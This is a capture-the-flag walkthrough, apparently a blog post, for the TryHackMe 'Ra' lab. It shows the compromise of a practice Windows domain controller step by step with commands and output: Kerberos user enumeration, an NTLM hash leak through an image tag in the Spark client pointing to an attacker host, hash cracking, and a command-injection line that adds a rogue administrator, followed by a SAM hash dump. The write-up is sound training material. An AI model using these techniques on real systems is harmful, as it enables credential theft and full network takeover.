TryHackMe >> Ra

Table of Content

DESCRIPTION

You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).

Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?

ENUM >> NMAP

# Nmap 7.92 scan initiated Mon Feb  7 21:34:49 2022 as: nmap -sT -A -p 53,80,88,135,139,389,445,464,593,636,2179,3268,3269,3389,5222,5269,7070,7443,7777,9090,9091 -oN nmap_agressive 10.10.222.51
Nmap scan report for 10.10.222.51
Host is up (0.35s latency).

PORT     STATE SERVICE             VERSION
53/tcp   open  domain              Simple DNS Plus
80/tcp   open  http                Microsoft IIS httpd 10.0
|_http-title: Windcorp.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec        Microsoft Windows Kerberos (server time: 2022-02-07 10:35:45Z)
135/tcp  open  msrpc               Microsoft Windows RPC
139/tcp  open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server       Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2022-02-06T10:28:31
|_Not valid after:  2022-08-08T10:28:31
|_ssl-date: 2022-02-07T10:37:40+00:00; +47s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-07T10:37:02+00:00
5222/tcp open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     unknown: 
|     compression_methods: 
|     xmpp: 
|       version: 1.0
|     features: 
|     stream_id: alldcg4s1r
|     auth_mechanisms: 
|_    capabilities: 
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_ssl-date: 2022-02-07T10:37:41+00:00; +47s from scanner time.
5269/tcp open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     unknown: 
|     compression_methods: 
|     xmpp: 
|     features: 
|     auth_mechanisms: 
|_    capabilities: 
7070/tcp open  http                Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open  ssl/http            Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
7777/tcp open  socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info: 
|_  No authentication
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:35:44 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:35:55 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open  ssl/xmltec-xmlmail?
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:36:10 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:36:12 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
Network Distance: 2 hops
Service Info: Host: FIRE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 46s, deviation: 0s, median: 46s
| smb2-time: 
|   date: 2022-02-07T10:37:06
|_  start_date: N/A

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   361.67 ms 10.9.0.1
2   361.81 ms 10.10.222.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  7 21:37:11 2022 -- 1 IP address (1 host up) scanned in 142.20 seconds
  • Seeing as we are dealing with a Windows domain controller (open port 88) it would be wise to add fire.windcorp.thm and windcorp.thm to local /etc/hosts

ENUM >> Userlist found in website HTML code…

  • The website has a list of their "IT support-staff", and they are all XMPP links…

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428

ENUM >> Kerbrute against harvested userlist

❯ ./kerbrute userenum --dc windcorp.thm -d windcorp.thm userlist

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/08/22 - Ronnie Flathers @ropnop

2022/02/08 01:45:11 >  Using KDC(s):
2022/02/08 01:45:11 >   windcorp.thm:88

2022/02/08 01:45:11 >  [+] VALID USERNAME:       tinygoose102@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       brownostrich284@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       Edward@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       Edeltraut@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       organicfish718@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       Emile@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       angrybird253@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       buse@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       goldencat416@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       happymeercat399@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       orangegorilla428@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       whiteleopard529@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       sadswan869@windcorp.thm
2022/02/08 01:45:12 >  Done! Tested 15 usernames (13 valid) in 0.758 seconds
  • These usernames are all well and good… but without any passwords they don’t hold much value… we need a different way in!

ENUM >> Some more users!

Turning back to the website, I decided to try and find something we could use to take advantage of the only other item on the front page that was interactable… the Reset Password button at the top right.

Upon closer inspection of the "Employees in focus" area it became obvious that "Lily Levesque" had a favourite pet… the dog in her picture! But what about the dogs name? The name of the image in the source code gives us a big clue!

Ok that’s all great… but none of our confirmed accounts match her name! Can we guess Lily’s?

Looking at the naming on the other 2 employees listed in this section, we can see a pattern… they seem to be first name then the first 2 letters of their surname. Just in case though we will throw their first name only in as a candidate:

Re-running Kerbrute on the updated list yields us two new results…

2022/02/08 13:28:39 >  [+] VALID USERNAME:       Kirkug@windcorp.thm
2022/02/08 13:28:39 >  [+] VALID USERNAME:       Lilyle@windcorp.thm

Hello there Lilyle! 😉

PRIVESC >> reset lilyle’s password

  • OK, now that we have both Lilyle‘s username and her dog’s name, lets give them a shot!:

  • Success! We now have Lilyle‘s password!

ENUM >> SMBMap

  • Let’s see if we get any SMB access from Lilyle‘s credentials:
❯ smbmap -H 10.10.173.233 -u lilyle -p ChangeMe#1234
[+] IP: 10.10.173.233:445       Name: fire.windcorp.thm
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        Shared                                                  READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY
LOOT >> "Flag 1.txt"
❯ smbclient -U lilyle \\\\10.10.173.233\\Shared
Enter WORKGROUP\lilyle's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 30 10:45:42 2020
  ..                                  D        0  Sat May 30 10:45:42 2020
  Flag 1.txt                          A       45  Sat May  2 01:32:36 2020
  spark_2_8_3.deb                     A 29526628  Sat May 30 10:45:01 2020
  spark_2_8_3.dmg                     A 99555201  Sun May  3 21:06:58 2020
  spark_2_8_3.exe                     A 78765568  Sun May  3 21:05:56 2020
  spark_2_8_3.tar.gz                  A 123216290  Sun May  3 21:07:24 2020

                15587583 blocks of size 4096. 10905638 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

❯ cat Flag\ 1.txt

ENUM >> Spark 2.8.3

Spark is a XMPP client, linked on the main website at http://fire.windcorp.thm directly below the list of "IT support-staff". On top of this, binaries exist in the public SMB share that LilyLe can see… this has to be a big hint!

So after installing the latest version of Spark (at the time 2.9.4) on my local machine and getting nowhere I decided to try my hand at the "suggested" version 2.8.3… First things first, after a quick google search I discovered the following CVE:

https://www.cvedetails.com/cve/CVE-2020-12772/

This pointed to the following reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md

  • Quoted in the README.md on GitHub:

    When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this:

    <img src=[external_ip]/test.img>

    Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!

  • … and also:

    By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).

Sounds like a plan! 🙂

  • Oh, and did I forget to mention that theart42 who discovered this CVE was also one of the creators of this room – and they specifically reference creating a CTF with this exact vulnerability? 😉 (probably helps too that all the example images on the GitHub repo were taken directly from this CTF too)

  • Firstly, go into the Advanced menu at the bottom of the window, and ensure that the 2 highlighted options are ticked:

  • With LilyLes username and password filled out, and the Domain set to windcorp.thm we can then hit the Login button:

  • Boot up responder (e.g. responder -I tun0) then go to Actions -> Start a chat and enter buse as our address (buse always seems to be online):

  • Send a message with <img src="http://<ATTACK_IP>/picture.jpg"> to Buse, then watch for the response in Responder:

[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.173.233
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : <REDACTED>
LOOT >> cracking buse’s NTLMv2 hash
❯ hashcat -m 5600 buse.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

<REDACTED>:<REDACTED>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:6da1ec088e2f0ad5:c28f54dab3f6b4c463f...000000
Time.Started.....: Tue Feb  8 16:55:04 2022 (4 secs)
Time.Estimated...: Tue Feb  8 16:55:08 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   951.0 kH/s (3.53ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2961408/14344385 (20.65%)
Rejected.........: 0/2961408 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> utrox11

Started: Tue Feb  8 16:54:41 2022
Stopped: Tue Feb  8 16:55:09 2022

PRIVESC >> Evil-WinRM shell with buse!

❯ evil-winrm -i 10.10.180.148 -u buse -p <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\buse\Documents> ls
*Evil-WinRM* PS C:\Users\buse\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> ls

    Directory: C:\Users\buse\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/7/2020   3:00 AM                Also stuff
d-----         5/7/2020   2:58 AM                Stuff
-a----         5/2/2020  11:53 AM             45 Flag 2.txt
-a----         5/1/2020   8:33 AM             37 Notes.txt

*Evil-WinRM* PS C:\Users\buse\Desktop>
LOOT >> "Flag 2.txt"
*Evil-WinRM* PS C:\Users\buse\Desktop> cat "Flag 2.txt"
<REDACTED>
LOOT >> checkservers.ps1 in C:\scripts
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"

# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)

# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p
if($p)
    {
     # if the Host is available then just write it to the screen
     write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
     [Array]$available += $_
    }
else
    {
     # If the host is unavailable, give a warning to screen
     write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
     $p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
     if(!($p))
       {
        # If the host is still unavailable for 4 full pings, write error and send email
        write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
        [Array]$notavailable += $_

        if ($OutageHosts -ne $Null)
            {
                if (!$OutageHosts.ContainsKey($_))
                {
                 # First time down add to the list and send email
                 Write-Host "$_ Is not in the OutageHosts list, first time down"
                 $OutageHosts.Add($_,(get-date))
                 $Now = Get-date
                 $Body = "$_ has not responded for 5 pings at $Now"
                 Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
                  -Subject "Host $_ is down" -SmtpServer $smtpserver
                }
                else
                {
                    # If the host is in the list do nothing for 1 hour and then remove from the list.
                    Write-Host "$_ Is in the OutageHosts list"
                    if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
                    {$OutageHosts.Remove($_)}
                }
            }
        else
            {
                # First time down create the list and send email
                Write-Host "Adding $_ to OutageHosts."
                $OutageHosts = @{$_=(get-date)}
                $Body = "$_ has not responded for 5 pings at $Now"
                Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
                 -Subject "Host $_ is down" -SmtpServer $smtpserver
            }
       }
    }
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
    # If there are more than a certain number of host down in an hour abort the script.
    $Exit = $True
    $body = $OutageHosts | Out-String
    Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
     -Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)

PRIVESC >> using checkservers.ps1 to gain Administrator

OK, so the powershell loot above seems like a massive chunk of script to take in… and you’d be right! The basic idea is that it uses Test-Connection to make connection to outside websites like google.com to see if the server has connection to the outside, if not it reports it.

However, there is one important bit that we care about at the very start of the code (after the variables):

get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p

Basically that script is grabbing the any line of C:\Users\brittanycr\hosts.txt that is not a comment (e.g. a line starts with #) and passing it to Test-Connection via Invoke-Expression

We can also tell by watching log.txt that this script is called every minute…

*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:06:26
*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:07:11

So, with a carefully crafted hosts.txt, checkservers.ps1 might lead us to SYSTEM…

  • But we need access to brittnaycr‘s home directory to write it…
*Evil-WinRM* PS C:\scripts> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                       Type             SID                                          Attributes
================================================ ================ ============================================ ==================================================
Everyone                                         Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                    Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access       Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                        Alias            S-1-5-32-548                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                     Alias            S-1-5-32-555                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                  Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                             Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                 Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                   Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
WINDCORP\IT                                      Group            S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                 Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level      Label            S-1-16-8448
  • Because we are a part of the Account Operators group, we do have limited access to modify standard users accounts… most importantly – changing their password!
*Evil-WinRM* PS C:\scripts> net user brittanycr hax0r3d! /domain
The command completed successfully.
  • Now we simply create a new hosts.txt file with the following contents:
;net user stimpz0r r00t3d! /add;net localgroup Administrators stimpz0r /add
  • Connect to SMB via brittnaycr‘s account and upload the modified hosts.txt:
❯ smbclient -U brittanycr \\\\10.10.135.16\\Users
Enter WORKGROUP\brittanycr's password:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \brittanycr\>
  • Then sit back and watch! 😉
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:11
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"
User stimpz0r was not found.
At line:1 char:1
+ Get-LocalUser "stimpz0r"
+ ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (stimpz0r:String) [Get-LocalUser], UserNotFoundException
    + FullyQualifiedErrorId : UserNotFound,Microsoft.PowerShell.Commands.GetLocalUserCommand
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:56
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"

Name     Enabled Description
----     ------- -----------
stimpz0r True
  • Finally, lets test out our new access:
❯ evil-winrm -i windcorp.thm -u stimpz0r -p r00t3d!

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami
windcorp\stimpz0r
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
  • We are here for one last thing (flag)…
LOOT >> Flag3.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat Flag3.txt
<REDACTED>

PRIVESC? >> that juicy Administrator password…

  • I managed to extract the NTLM hash from the Administrator account using CrackMapExec:
❯ crackmapexec smb 10.10.26.119 -u stimpz0r -p r00t3d! --sam
SMB         10.10.26.119    445    FIRE             [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.26.119    445    FIRE             [+] windcorp.thm\stimpz0r:r00t3d! (Pwn3d!)
SMB         10.10.26.119    445    FIRE             [+] Dumping SAM hashes
SMB         10.10.26.119    445    FIRE             Administrator:500:aad3b435b51404eeaad3b435b51404ee:a47c1e6ce2d356a67cde3a743b465b16:::
SMB         10.10.26.119    445    FIRE             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.26.119    445    FIRE             DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB         10.10.26.119    445    FIRE             [+] Added 3 SAM hashes to the database

Pasted image 20220209152438.png

  • BUT – no dice… 🙁
❯ crackmapexec smb 10.10.26.119 -u Administrator -p Secret1234
SMB         10.10.26.119    445    FIRE             [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.26.119    445    FIRE             [-] windcorp.thm\Administrator:Secret1234 STATUS_LOGON_FAILURE
❯ crackmapexec winrm 10.10.26.119 -u Administrator -H a47c1e6ce2d356a67cde3a743b465b16
WINRM       10.10.26.119    5985   FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm)
WINRM       10.10.26.119    5985   FIRE             [*] http://10.10.26.119:5985/wsman
WINRM       10.10.26.119    5985   FIRE             [-] windcorp.thm\Administrator:a47c1e6ce2d356a67cde3a743b465b16
❯ evil-winrm -i windcorp.thm -u Administrator -p Secret1234

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1



Leave a Reply

Your email address will not be published.